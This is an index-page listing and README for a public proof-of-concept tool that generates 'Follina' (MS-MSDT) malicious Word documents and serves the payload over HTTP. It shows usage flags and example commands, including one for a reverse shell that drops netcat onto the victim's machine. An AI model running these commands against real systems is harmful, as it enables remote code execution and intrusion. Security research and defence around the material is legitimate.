Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/JohnHammond/msdt-follina
Codebase to generate an msdt-follina payload
https://github.com/JohnHammond/msdt-follina
Last synced: 3 months ago
JSON representation
Codebase to generate an msdt-follina payload
- Host: GitHub
- URL: https://github.com/JohnHammond/msdt-follina
- Owner: JohnHammond
- Created: 2022-05-30T15:06:11.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-06-08T15:47:38.000Z (over 2 years ago)
- Last Synced: 2024-06-06T20:03:09.445Z (5 months ago)
- Language: Python
- Size: 38.1 KB
- Stars: 1,606
- Watchers: 39
- Forks: 383
- Open Issues: 18
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - JohnHammond/msdt-follina - Codebase to generate an msdt-follina payload (Python)
README
# MS-MSDT "Follina" Attack Vector
> John Hammond | May 30, 2022
--------------
Create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server.
# Usage
```
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help show this help message and exit
--command COMMAND, -c COMMAND
command to run on the target (default: calc)
--output OUTPUT, -o OUTPUT
output maldoc file (default: ./follina.doc)
--interface INTERFACE, -i INTERFACE
network interface or IP address to host the HTTP server (default: eth0)
--port PORT, -p PORT port to serve the HTTP server (default: 8000)
```
# Examples
Pop `calc.exe`:
```
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
```
Pop `notepad.exe`:
```
$ python3 follina.py -c "notepad"
```
Get a reverse shell on port 9001. **Note, this downloads a netcat binary _onto the victim_ and places it in `C:\Windows\Tasks`. It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.**
```
$ python3 follina.py -r 9001
```
